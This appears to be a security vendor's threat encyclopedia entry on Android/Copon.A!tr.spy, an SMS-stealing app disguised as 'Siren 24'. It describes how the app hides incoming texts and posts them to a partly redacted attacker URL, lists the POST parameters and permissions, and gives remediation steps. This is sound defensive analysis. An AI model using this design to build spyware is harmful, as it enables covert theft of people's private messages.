Android/Copon.A!tr.spy

Analysis

Android/Copon.A!tr.spy is a piece of malware targetting Android mobile phones.
The malicious package comes disguised as an application called "Siren 24" that performs no real function. However, once launched, it hides all incoming SMS messages from the end user and forwards captured SMS info to the attacker's server.

Technical Details

The main application is called "Siren 24" (translated from Korean) as seen in Fig1. It comes in the package "com.Copon"

Fig1 : Siren 24 application in main menu
However, when launched, the user merely sees an error message as seen in Fig2.

Fig2 : Upon launching the application
The malicious activity that takes place in the background is completely hidden from the victim and is explained below.
MainActivity : This activity is responsible for displaying the main launch screen seen in Fig2. It also starts the clService that performs the main malicious activity of the application as explained next.
SMS : This receiver is responsible for monitoring incoming SMS messages and hiding them from the victim.
clService : This service monitors incoming SMS messages received on the infected phone. When an SMS is received, the received SMS information is then forwarded in an HTTP POST message to the attacker's server

"http://XXX.XX.XXX.205:8080/zzz/login.php"

with the following parameters

• num1 = [Victim's phone number]
• num2 = [Phone number of sender of received SMS]
• com = [Received SMS body]
all UTF-8 encoded

Permissions required by the application:

• INTERNET
• SEND_SMS
• RECEIVE_SMS
• READ_PHONE_STATE

Recommended Action

FortiGate Systems

• Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
  FortiClient Systems
  
• Quarantine/delete files that are detected and replace infected files with clean backup copies.